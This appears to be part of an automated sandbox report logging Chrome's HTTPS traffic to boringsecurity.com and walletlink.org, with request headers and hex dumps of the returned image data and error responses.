                                                                          2023-12-10 16:45:00 UTC5930INData Raw: ae 40 8a 58 34 87 b9 bd 17 28 1b 8b 85 43 a1 47 2e b5 9a 71 b8 ab 69 8e 49 82 76 ab 1a 04 99 84 94 3e 9f 25 a6 fa 9b e3 9a 32 eb eb 9c 68 cf 9a 75 d8 ad f6 fa 3d 2c f9 96 0b d4 a3 96 2e a0 6d f2 34 4d df 56 f9 8f 05 80 ad e2 8c b2 b6 93 72 ab 72 68 7a dc e9 99 25 71 67 05 85 01 c0 8d 74 75 5e f3 4c 67 d3 db 18 0f 14 65 c0 41 01 86 20 f5 8c ee 5e 0d 90 b4 27 95 c5 2d e0 d1 17 7b d4 d4 cd 8c 2c 63 2d 21 14 96 8c e4 99 4f 3a d0 da 2e 32 60 09 a5 27 58 de 02 e0 48 d0 c8 60 81 79 ed 10 01 b2 82 a7 e8 1c be 24 ea e4 ec 3f f3 d6 1c fb 2f 3c 97 0d 3f 4b ca 7b 9b 3a 75 e2 b3 97 ab 8a 74 ab a7 99 ec ae 24 f0 fc 20 4a a8 aa e6 02 2c b7 82 05 d6 b0 9e 28 91 82 c6 1b 73 59 d6 53 53 6d 8a 90 f5 a8 84 9d 26 29 61 8a aa 7b 18 a3 45 06 b2 26 db 9c e2 b1 28 64 c2 6d b8 14
                                                                          Data Ascii: @X4(CG.qiIv>%2hu=,.m4MVrrhz%qgtu^LgeA ^'-{,c-!O:.2`'XH`y$?/<?K{:ut$ J,(sYSSm&)a{E&(dm
                                                                          2023-12-10 16:45:00 UTC1144INData Raw: 75 95 76 8e 3a 9e 96 6b 5c 53 f7 14 85 e4 ae a7 af cf 24 82 92 40 8b 33 97 4b 4d 6a 3b 17 b7 f2 f3 45 a2 47 91 07 21 9c 92 9a b9 28 24 91 ba de 86 bb 28 54 05 d0 5c 68 8f 15 ec 84 18 08 40 9a ee 29 68 6a 06 c6 45 f7 82 19 b0 ec ad ca 84 b7 24 3c a9 24 09 24 09 24 09 24 09 24 09 24 09 24 09 24 09 24 09 24 64 92 04 a9 07 ce e8 c9 87 b1 5a 93 4f 3e 49 2b 9b 32 48 ee 28 a4 9d 35 24 db ce 95 20 5c 91 12 48 12 48 12 a4 09 72 05 dc 89 dd c8 17 72 27 72 40 a9 24 e8 62 c9 c1 67 6e 4c 07 87 24 99 e5 c9 b9 ce 04 9e 9e 3e 90 52 79 3b 27 99 29 f5 c9 26 29 3f 3d 27 a7 18 f5 52 64 cc 49 3c f7 48 49 a3 f3 b7 27 b7 cf 52 40 92 40 92 46 49 20 e4 91 12 a4 09 24 09 24 09 24 65 37 22 ed 02 72 2e 80 31 23 e6 3e 64 79 ef 52 2d f5 52 4f 25 0e 40 cb b2 4b 2f 2e 41 30 39 1c 2f 24
                                                                          Data Ascii: uv:k\S$@3KMj;EG!($(T\h@)hjE$<$$$$$$$$$$dZO>I+2H(5$ \HHrr'r@$bgnL$>Ry;')&)?='RdI<HI'R@@FI $$$e7"r.1#>dyR-RO%@K/.A09/$
                                                                          2023-12-10 16:45:00 UTC2INData Raw: 0d 0a
                                                                          Data Ascii:
                                                                          2023-12-10 16:45:00 UTC4096INData Raw: 34 30 30 30 0d 0a 4d 3c b1 43 6a 17 68 4b 2f 54 5a 57 2f 64 de b1 ac 55 9c fd ec 6c bd 0d ff 00 67 a5 d6 b1 34 55 c4 bd 0e a5 33 b9 6d ad 93 74 1e 56 5b 14 0d 2f 63 85 6d 35 60 ce 1a fa 3d 40 85 ad d9 de ae 23 7d 7b 5a b6 c5 be 5b 8b 3d b4 d5 b1 25 97 57 54 7b 1a c3 0f 56 f8 e2 37 41 dc a8 dc c4 ed 03 b8 af ec d4 7d 3d 7d e0 e9 5d 5c eb 4f e2 cd 76 36 98 16 15 d8 d7 5b a7 a7 59 35 1a 6b 74 d6 2e 4c ae 1f 94 45 dc f7 b6 da 91 4b cc 7a e8 58 cf b9 ab d3 3b c7 a4 09 ec 7a 63 a5 7a 3b 9c 2e 9a 94 85 89 f2 be a1 12 3d d6 3c c6 23 7b 4d 37 f4 fa a3 ff 00 52 7b 47 7c c5 19 31 7a 67 73 f5 ad 77 3e aa 6f 9b d6 67 2e 9f 6d 9f 65 47 6d da 81 eb e9 a7 fb 35 39 07 91 e3 3b 34 d3 8e fa 86 3b f7 bc dc f3 71 82 d2 26 98 d7 8d eb 0d c0 35 9e cb 9d b1 2b 5b 94 d2 8a a8 d6
                                                                          Data Ascii: 4000M<CjhK/TZW/dUlg4U3mtV[/cm5`=@#}{Z[=%WT{V7A}=}]\Ov6[Y5kt.LEKzX;zcz;.=<#{M7R{G|1zgsw>og.meGm59;4;q&5+[
                                                                          2023-12-10 16:45:00 UTC10674INData Raw: f3 d6 26 5e 2d ac b3 c5 39 0f 6b 3c 5d 52 a8 4d 4d 60 73 a1 8a 6b 8e e7 26 af d3 e2 af 13 c6 5b 32 6c 72 2b 4d 12 7d cf eb 6f 61 a9 f9 d1 07 bf 46 ee 3a e9 e3 7d d6 3e d8 89 b1 59 b2 2c 73 75 94 53 c9 15 42 87 7d b1 13 6f 42 c0 4e ef d2 d6 f5 2a 8a c7 77 8f d9 41 40 37 08 4f 18 14 ae 33 6d 66 bd 7f 13 35 9c b6 d8 b4 78 6d ca f2 b2 3c 62 d4 96 fe 48 69 2c d9 6d 76 56 97 e9 d1 6b d3 1f 42 7a 9a 7c 9e 37 a9 db f6 3c 63 81 a0 b3 c3 6a ec b1 29 af 55 61 d5 ea 3f 19 48 d5 36 a3 f1 74 5c b6 ab 50 e3 2c de ad cd 65 af 0c 5a e0 ac 75 00 d8 4d 89 50 b2 cc 9e 8b 90 4e f7 18 99 db 3d 4e 7a bf 60 65 1f d3 cc f4 cc 40 ed 16 bb eb 6d 83 51 05 08 91 76 c5 ef 79 6d d2 cf ad 3d 47 1b 48 6f 59 c1 6d 55 54 04 c5 4c 6f b9 1a ac cc cc cc cc cc cc cd d3 33 74 73 db 02 69 e9 ad
                                                                          Data Ascii: &^-9k<]RMM`sk&[2lr+M}oaF:}>Y,suSB}oBN*wA@7O3mf5xm<bHi,mvVkBz|7<cj)Ua?H6t\P,eZuMPN=Nz`e@mQvym=GHoYmUTLo3tsi


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          159192.168.2.54989375.2.60.54435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:45:00 UTC659OUTGET /_ipx/w_640,q_75/%2Fimages%2Fbrushed.jpg?url=%2Fimages%2Fbrushed.jpg&w=640&q=75 HTTP/1.1
                                                                          Host: boringsecurity.com
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                          Sec-Fetch-Site: same-origin
                                                                          Sec-Fetch-Mode: no-cors
                                                                          Sec-Fetch-Dest: image
                                                                          Referer: https://boringsecurity.com/
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2023-12-10 16:45:00 UTC410INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 41 67 65 3a 20 35 30 39 33 32 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 70 75 62 6c 69 63 2c 6d 61 78 2d 61 67 65 3d 30 2c 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 0d 0a 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 22 4e 65 74 6c 69 66 79 20 45 64 67 65 22 3b 20 68 69 74 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 33 31 35 30 32 0d 0a 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 69 6d 61 67 65 2f 6a 70 65 67 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 35 3a 30 30 20 47 4d 54 0d 0a 45 74 61 67 3a 20 33 61 2d 78 4f
                                                                          Data Ascii: HTTP/1.1 200 OKAge: 50932Cache-Control: public,max-age=0,must-revalidateCache-Status: "Netlify Edge"; hitContent-Length: 31502Content-Security-Policy: default-src 'none'Content-Type: image/jpegDate: Sun, 10 Dec 2023 16:45:00 GMTEtag: 3a-xO
                                                                          2023-12-10 16:45:00 UTC776INData Raw: ff d8 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d 38 32 3c 2e 33 34 32 ff db 00 43 01 09 09 09 0c 0b 0c 18 0d 0d 18 32 21 1c 21 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 ff c2 00 11 08 01 dc 01 f4 03 01 22 00 02 11 01 03 11 01 ff c4 00 19 00 00 03 01 01 01 00 00 00 00 00 00 00 00 00 00 00 01 02 03 00 04 06 ff c4 00 15 01 01 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 02 ff da 00 0c 03 01 00 02 10 03 10 00 00 01 f4 a0 4e a5 d6 48 55 64 a5 51 01 40 8a 53 48 94 33 61 c1 61 4b 63 32 91 ca 12 85 18 62 08 58 13
                                                                          Data Ascii: C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"NHUdQ@SH3aaKc2bX
                                                                          2023-12-10 16:45:00 UTC2372INData Raw: 25 1e 82 3d 1c 5a 31 03 0c 53 4f 1d 01 54 68 99 9a 79 40 ac a0 0e 09 93 82 c8 0b 37 3b 16 a7 3b 97 d2 25 32 38 ce ac 12 31 56 93 14 32 25 74 c1 54 50 15 20 0a d8 98 a2 08 95 52 49 64 22 94 42 60 a8 44 d0 b6 e7 c7 49 e5 c7 53 73 54 bd 23 73 50 b1 98 b0 ba 98 90 b0 20 28 84 d5 a6 64 20 50 d8 9e b9 39 8f 51 39 9a e0 57 52 36 52 3b 2d 0c 4e 19 94 8e c8 4a 19 12 9a 64 a0 4c 15 00 cb 94 28 54 c0 29 86 53 61 31 c4 c1 44 40 05 38 04 91 4b b8 b4 24 cc d4 11 8e 36 38 b2 3a 92 4b 48 55 69 81 1b 08 4a 99 5c 09 9c 8a c5 81 50 42 c8 4a e4 25 5a 4c 39 0e 28 72 23 50 91 35 24 b5 14 55 70 2e c0 c3 00 2e 40 cc a9 34 69 0c a8 a5 74 31 55 99 09 04 27 39 9d 5c 66 18 67 0e 6c d8 aa 84 0a 60 2a 38 24 b6 04 b5 49 11 60 49 ab 89 97 c0 60 c6 39 8c d9 86 65 73 3a 91 8a e2 8d 10 5c
                                                                          Data Ascii: %=Z1SOThy@7;;%281V2%tTP RId"B`DISsT#sP (d P9Q9WR6R;-NJdL(T)Sa1D@8K$68:KHUiJ\PBJ%ZL9(r#P5$Up..@4it1U'9\fgl`*8$I`I`9es:\
                                                                          2023-12-10 16:45:00 UTC538INData Raw: 98 83 9a 5a 47 4e 9d 18 e0 70 3c 48 44 0f 6f 5d 18 f5 69 2d 23 3a 31 9c 38 28 14 0a 0a c1 48 28 54 52 29 14 8a 44 74 5b 42 fa 42 f8 e6 f8 4a 26 60 99 c4 70 38 1c 16 1c 1c 22 a7 05 07 93 84 50 8a 0b 03 c9 e7 e3 83 83 83 c4 78 96 1e 27 91 c1 d3 ba 47 0e 1c 38 70 ac 14 82 90 54 5a 65 86 32 c5 8b 0c 7a e8 a4 e9 d3 a7 4f 47 b1 66 7b 3d 1e 8f 43 c8 79 0e 4e 91 62 d9 16 cc be 65 b2 2f 23 c8 e9 e8 e1 c3 84 a3 87 0e 1e 4e 1c 19 61 8c b1 62 c5 cb 96 2d 23 da 2a 56 0a c1 58 14 08 47 4e 9e 8e 9d 3d 1e 85 90 b2 3d 9e 87 3a e1 e4 f2 79 16 22 c4 f2 73 e5 96 c8 79 16 c8 72 3d 39 19 33 3b 7f 48 42 2a 54 a9 51 49 d3 a3 92 d2 31 ce 98 e4 e8 cb 16 92 f9 17 c8 b4 8c b0 c7 a6 32 47 f0 c6 5a 4f d3 23 f4 c8 fd 32 3f 49 2c 44 91 be 9e 85 96 96 d4 88 a8 84 2f 9e fc a1 7c 38 1c 16
                                                                          Data Ascii: ZGNp<HDo]i-#:18(H(TR)Dt[BBJ&`p8"Px'G8pTZe2zOGf{=CyNbe/#Nab-#*VXGN==:y"syr=93;HB*TQI12GZO#2?I,D/|8
                                                                          2023-12-10 16:45:00 UTC4744INData Raw: 70 e0 c6 3d 54 a1 42 85 24 52 2c 8f 47 7e b8 79 3c 0f 03 c9 e0 f0 78 38 53 13 f3 c4 a6 25 71 2b 80 b0 3c e9 8f 48 42 11 52 a5 64 78 9e 4f 24 a3 9a ac 14 28 50 5a 65 8b 41 68 2f 89 fa 41 78 3f 42 e5 a4 89 93 a3 92 c3 19 d3 a7 74 c7 f7 d3 a7 49 26 04 2d 31 96 1e a2 24 e8 a4 8b 1e 88 b0 f2 1c 8e 4e 8f 01 e2 3c 49 27 4b 68 52 29 16 da 1e d0 85 a4 54 ac 15 14 6d 8c e0 f1 2d 05 86 3d 74 52 21 13 13 a9 18 ce 0a 0a 95 28 56 44 74 82 32 2d 05 b1 2d 05 a0 b4 0b 23 d1 e8 63 19 62 df c1 c9 79 3f 43 f4 92 e3 fe 0c 63 83 87 3e 90 be 59 62 c5 8b 9f a4 9f a6 45 b2 93 d1 e8 f6 7a 3d 0b 31 64 54 a9 51 46 98 f4 8a 95 91 49 52 a5 45 22 93 a4 44 91 12 2d 29 3a 29 3b b8 fe 3c d2 81 40 b4 8a 94 3f 32 85 49 8c 4f 27 93 c9 58 29 05 31 2a 22 ba e9 dd 44 15 c4 ac 15 39 f1 d3 a7 4e
                                                                          Data Ascii: p=TB$R,G~y<x8S%q+<HBRdxO$(PZeAh/Ax?BtI&-1$N<I'KhR)Tm-=tR!(VDt2--#cby?Cc>YbEz=1dTQFIRE"D-):);<@?2IO'X)1*"D9N
                                                                          2023-12-10 16:45:00 UTC5930INData Raw: f0 8d 62 a8 aa de 56 f2 b7 95 bc ad e5 6a 10 84 23 97 6e dd eb 29 4b 0c 31 a4 a5 29 4f e2 85 ab 16 2c a2 d5 ab 68 84 21 0e dd bb 76 ed db b6 37 7c ee f9 dd 34 4d 13 4f 59 4a 57 2e e5 75 37 5f 4d d7 f2 bb 94 f2 9e 53 ca 79 77 e9 86 18 61 34 4e b8 4d 13 e2 9a 25 3a 4b 2c b2 fa 65 9f 49 4a 52 bd 7a f5 dc 2f e1 fb 2b b3 f6 55 7d 57 55 35 4f 96 cf ad 99 5e ba a9 4f a7 6e f5 85 ab 79 5b ca de 51 56 59 65 d3 a7 4e 9d 3a f5 c2 28 b7 c5 14 45 18 4a 52 9a a7 c9 f4 cf a7 49 e1 34 d9 34 4d 13 45 d4 5c bd 7d 57 d7 65 de 4b fc 97 f9 2e f2 4f 92 7c 91 a6 18 61 8d d1 4d d1 e2 c7 a4 ae 5d 55 d5 5d e4 ba a9 aa 52 94 a7 4e d0 84 21 08 a2 28 8a 21 08 7d 3e 99 4d 52 9f 5c 3e 5f 2e 91 c2 ce 16 70 b2 8b 16 a1 1a 65 94 a5 d3 ad 25 35 4d 53 5d d3 e5 ba 6b ba 79 4f 29 4d 35 ed 08
                                                                          Data Ascii: bVj#n)K1)O,h!v7|4MOYJW.u7_MSywa4NM%:K,eIJRz/+U}WU5O^Ony[QVYeN:(EJRI44ME\}WeK.O|aM]U]RN!(!}>MR\>_.pe%5MS]kyO)M5
                                                                          2023-12-10 16:45:00 UTC7116INData Raw: cc d6 35 0c f1 dd 8a e6 66 e3 5c 31 f6 c3 7e 88 bf 7f d3 91 8f ee f4 3f 60 33 32 ba 0c 31 68 76 1b e1 b0 93 f2 4c c1 1f e3 b7 a1 49 31 25 88 09 1e e2 a1 78 a9 86 b1 09 58 1c f6 38 fc 2a 77 33 06 be 83 e0 c7 93 72 2a 4f c8 d2 a2 1d 80 c8 90 93 a1 ec a1 8d 06 b5 ce 06 2f 72 85 f0 8a b5 c4 ac 77 33 57 17 d4 2a f0 91 63 13 18 c2 ac b9 3a ae 28 e2 ce 3b 1a 24 48 e7 f0 34 71 e4 f2 b0 f4 76 1d 4b a1 ac 6b 8c 3c 0c 7f 60 e9 6e 26 ab 8d 16 0c ed 52 b8 d1 ff 00 61 b0 19 1a 1f 24 09 08 9a b7 3b 7d 8d e1 0c cd d9 5d ee c5 c5 b1 b5 14 54 42 34 97 c0 e3 28 51 45 d1 3c 91 0e 81 a6 10 72 29 97 e0 97 c7 e8 95 17 1a 14 78 b4 23 1f 41 70 a9 f8 91 a2 b0 c9 d8 49 fa 55 5e 3c 1c 4f d0 a4 fd 7c f0 45 7e 78 39 76 22 8e c6 85 c9 fa 8a 3e c9 4f 0f 3c 0f be 17 e4 80 93 a8 9e aa c2
                                                                          Data Ascii: 5f\1~?`321hvLI1%xX8*w3r*O/rw3W*c:(;$H4qvKk<`n&Ra$;}]TB4(QE<r)x#ApIU^<O|E~x9v">O<
                                                                          2023-12-10 16:45:00 UTC8302INData Raw: 79 94 fd 0c e8 9e 18 d5 81 e6 81 d5 b6 ee 81 b2 1d 18 99 80 f9 de 56 61 46 8e f2 fb c0 ec 24 b3 75 8b 98 2f 47 e9 07 7b 5d a5 0e 6b b0 ed 10 c4 3c bb 40 5c 8f 2e d0 45 b7 f1 da 1d e0 9a e2 07 f0 7b 45 c7 17 bf d2 30 b5 f3 fd 47 71 af 46 37 78 2f 5b 77 8c d8 2f ce b0 17 47 ba ef 10 c9 a9 fb 8a b0 50 2a bb ba bf e4 78 4b b0 d7 f2 62 e3 e5 af 51 2f 95 0e 05 ee cd c8 d4 f2 95 cf 1b 47 dc 43 8f c2 0c f7 b7 42 58 28 3b d4 b1 e8 42 9f 5e c8 f1 16 bf 78 41 62 a5 fd e1 05 63 57 2f f3 02 33 3a 51 f9 a8 bc df 75 44 2e 17 88 d4 de 0f 30 de 27 1c 3c 03 dc 71 3f 0f da 00 e6 3f 7a c0 0e 0b 7d 52 a8 68 75 65 a7 e8 f8 81 d1 57 7d a9 43 e5 b6 d0 e3 7c 8d a2 5f 63 85 f8 7c 1e e6 23 f8 ee 4b f1 6a 77 60 d3 1f cc 18 16 1d 5d a0 d1 91 d6 64 a8 80 33 88 4e 3c 3f db 26 06 1f 12
                                                                          Data Ascii: yVaF$u/G{]k<@\.E{E0GqF7x/[w/GP*xKbQ/GCBX(;B^xAbcW/3:QuD.0'<q??z}RhueW}C|_c|#Kjw`]d3N<?&
                                                                          2023-12-10 16:45:00 UTC1724INData Raw: 59 4a f6 11 79 37 60 8b 4c b7 b4 77 d0 bc ab 69 b2 0a e1 5e e2 21 c5 e3 da 24 78 ba ad a5 98 59 6f 3c e5 bb aa ef 1e 5f 1f 78 86 b8 dd 03 fe 31 0e 3a 52 8c db 51 39 a9 d2 dd a2 4e 17 41 7d 4c 4c 4f 5f a2 5d c3 c8 da 07 20 9d 18 93 0d 3b 40 c3 36 ba e2 2f 62 5b 95 5d 98 85 80 0e aa 58 5a 57 aa da 66 4f 3f a8 81 c1 4e e9 ea 58 58 f6 5b 69 6b 16 ef 16 79 a7 54 44 a7 07 5c 48 d1 db 51 ba be 64 58 b0 bb 0c 06 ef c0 08 1f b3 82 c0 1e 78 e0 e3 83 da 68 57 e7 6d 0b 46 96 1f 52 87 85 d4 ed 01 0f e4 da 15 55 e7 5f a4 31 4b 0e 8e d2 e7 a7 f9 28 62 b5 5d a2 78 1f 6c a0 a9 56 76 fa c1 e5 7f bd 22 d6 27 5a 6d 0e 07 cc 97 6c e7 66 39 2d f8 99 72 1d c9 8c ba b4 8b d0 fe 73 96 9e a4 41 9f ca 88 84 3e 7e a3 b6 ff 00 91 27 9d db 69 4a dd 35 36 80 8e 0e 9f 53 86 55 d6 bd 45
                                                                          Data Ascii: YJy7`Lwi^!$xYo<_x1:RQ9NA}LLO_] ;@6/b[]XZWfO?NXX[ikyTD\HQdXxhWmFRU_1K(b]xlVv"'Zmlf9-rsA>~'iJ56SUE


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          160192.168.2.54989475.2.60.54435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:45:00 UTC787OUTGET /_ipx/w_48,q_75/https%3A%2F%2Fboring-security-cms.s3.amazonaws.com%2Fthumbnail_ispeaknerd_9fc9526715.png?url=https%3A%2F%2Fboring-security-cms.s3.amazonaws.com%2Fthumbnail_ispeaknerd_9fc9526715.png&w=48&q=75 HTTP/1.1
                                                                          Host: boringsecurity.com
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                          Sec-Fetch-Site: same-origin
                                                                          Sec-Fetch-Mode: no-cors
                                                                          Sec-Fetch-Dest: image
                                                                          Referer: https://boringsecurity.com/
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2023-12-10 16:45:00 UTC408INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 41 67 65 3a 20 35 30 39 33 32 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 70 75 62 6c 69 63 2c 6d 61 78 2d 61 67 65 3d 30 2c 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 0d 0a 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 22 4e 65 74 6c 69 66 79 20 45 64 67 65 22 3b 20 68 69 74 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 35 39 39 0d 0a 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 69 6d 61 67 65 2f 70 6e 67 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 35 3a 30 30 20 47 4d 54 0d 0a 45 74 61 67 3a 20 33 35 2d 62 30 59 31
                                                                          Data Ascii: HTTP/1.1 200 OKAge: 50932Cache-Control: public,max-age=0,must-revalidateCache-Status: "Netlify Edge"; hitContent-Length: 1599Content-Security-Policy: default-src 'none'Content-Type: image/pngDate: Sun, 10 Dec 2023 16:45:00 GMTEtag: 35-b0Y1
                                                                          2023-12-10 16:45:00 UTC778INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 30 00 00 00 30 08 03 00 00 00 60 dc 09 b5 00 00 01 3b 50 4c 54 45 c4 66 ff ca 68 ff d0 6d ff 65 00 9a fd fd fe c1 64 fc c3 65 fd ff ff ff fc fc fc ff ff fe d2 6d ff ce 6b ff c6 67 ff c3 65 fe d4 70 ff be c0 bd 3e 3f 3d c7 cb c4 39 04 56 f7 f9 f5 62 63 61 04 02 06 f1 f4 f0 80 82 7f be 60 f2 4d 4a 4f 61 29 80 6c 6a 6d da dd dc a6 ab a6 89 8c 88 58 5a 59 40 02 64 93 94 93 71 72 71 f7 fb ff b7 5b ea c1 60 fa ae af ad 78 7b 78 93 46 bd 62 59 66 a6 54 d6 29 12 37 b5 b7 b5 b0 58 e1 88 43 af cc d2 cd 20 1c 1b 45 43 45 4e 04 76 68 37 84 e8 ec e9 3a 1b 46 9b 9f 99 e1 e3 e0 4b 2a 5c 7c 37 a2 54 29 6c 63 53 3e 35 36 35 5b 2e 72 cb 6b ff 6d 2f 8f a5 5e 00 d6 db d3 29 29 29 70 03 a5 46 2f 52 53 50 54 9a 48 cb a1
                                                                          Data Ascii: PNGIHDR00`;PLTEfhmedemkgep>?=9Vbca`MJOa)ljmXZY@dqrq[`x{xFbYfT)7XC ECENvh7:FK*\|7T)lcS>565[.rkm/^)))pF/RSPTH
                                                                          2023-12-10 16:45:00 UTC821INData Raw: c5 e5 9e dc 55 56 e7 2a 61 3f 2d f4 f2 fe 60 b8 48 87 0e be 4f 01 55 26 84 10 25 cd 9c 66 9b 2c 2b 3b db 1c a0 50 be d5 42 52 c3 00 0c bc 8d 45 41 76 09 f9 a6 20 23 75 2e 8c ac b4 58 d9 18 3c df 33 f6 f0 58 7a 70 80 83 b5 b1 73 75 7e 7e 3a b1 aa 22 51 03 69 91 bc 4c de 85 90 2c 54 4a 51 b6 b1 ed 87 8a 73 78 2c 25 0c a0 48 56 f2 7d 1f b3 ed a2 4d 9c 27 bd b4 a2 30 42 96 65 46 d8 e9 d2 2e 78 c0 1d 4e dd 87 12 e7 de 18 60 44 44 16 16 83 e7 34 a0 ba 84 92 5e 38 ca 3b 09 72 09 b7 01 9b 20 44 ec 40 c9 00 70 77 ef 73 29 ff 79 e2 02 28 12 ab 7d 0c 18 83 31 10 89 fd d8 a7 60 e8 21 51 26 ce 66 29 a0 c9 2e 44 c4 47 dd 03 f4 7b 26 f0 70 27 35 22 80 91 d2 8a 32 15 02 7f d7 99 71 76 bd ac 2b f1 90 96 51 f2 b5 c9 50 b6 09 22 7b a1 1c 80 bb ba 77 7b 7c 7c 01 14 50 3e c8
                                                                          Data Ascii: UV*a?-`HOU&%f,+;PBREAv #u.X<3Xzpsu~~:"QiL,TJQsx,%HV}M'0BeF.xN`DD4^8;r D@pws)y(}1`!Q&f).DG{&p'5"2qv+QP"{w{||P>


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          161192.168.2.549882104.18.37.84435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:45:00 UTC503OUTGET /rpc HTTP/1.1
                                                                          Host: www.walletlink.org
                                                                          Connection: Upgrade
                                                                          Pragma: no-cache
                                                                          Cache-Control: no-cache
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          Upgrade: websocket
                                                                          Origin: https://boringsecurity.com
                                                                          Sec-WebSocket-Version: 13
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Sec-WebSocket-Key: xRCod0EeMZAUT35boGIyuQ==
                                                                          Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
                                                                          2023-12-10 16:45:00 UTC358INData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 35 3a 30 30 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 32 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 48 65 61 64 65 72 73 3a 20 41 75 74 68 6f 72 69 7a 61 74 69 6f 6e 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4f 72 69 67 69 6e 3a 20 2a 0d 0a 53 65 63 2d 57 65 62 73 6f 63 6b 65 74 2d 56 65 72 73 69 6f 6e 3a 20 31 33 0d 0a 58 2d 43 6f 6e 74 65 6e
                                                                          Data Ascii: HTTP/1.1 400 Bad RequestDate: Sun, 10 Dec 2023 16:45:00 GMTContent-Type: text/plain; charset=utf-8Content-Length: 12Connection: closeAccess-Control-Allow-Headers: AuthorizationAccess-Control-Allow-Origin: *Sec-Websocket-Version: 13X-Conten
                                                                          2023-12-10 16:45:00 UTC12INData Raw: 42 61 64 20 52 65 71 75 65 73 74 0a
                                                                          Data Ascii: Bad Request


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          162192.168.2.54989875.2.60.54435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:45:00 UTC690OUTGET /_next/image?url=https%3A%2F%2Fboring-security-cms.s3.amazonaws.com%2Fthumbnail_rebel_0f05b31e80.jpg&w=48&q=75 HTTP/1.1
                                                                          Host: boringsecurity.com
                                                                          Connection: keep-alive
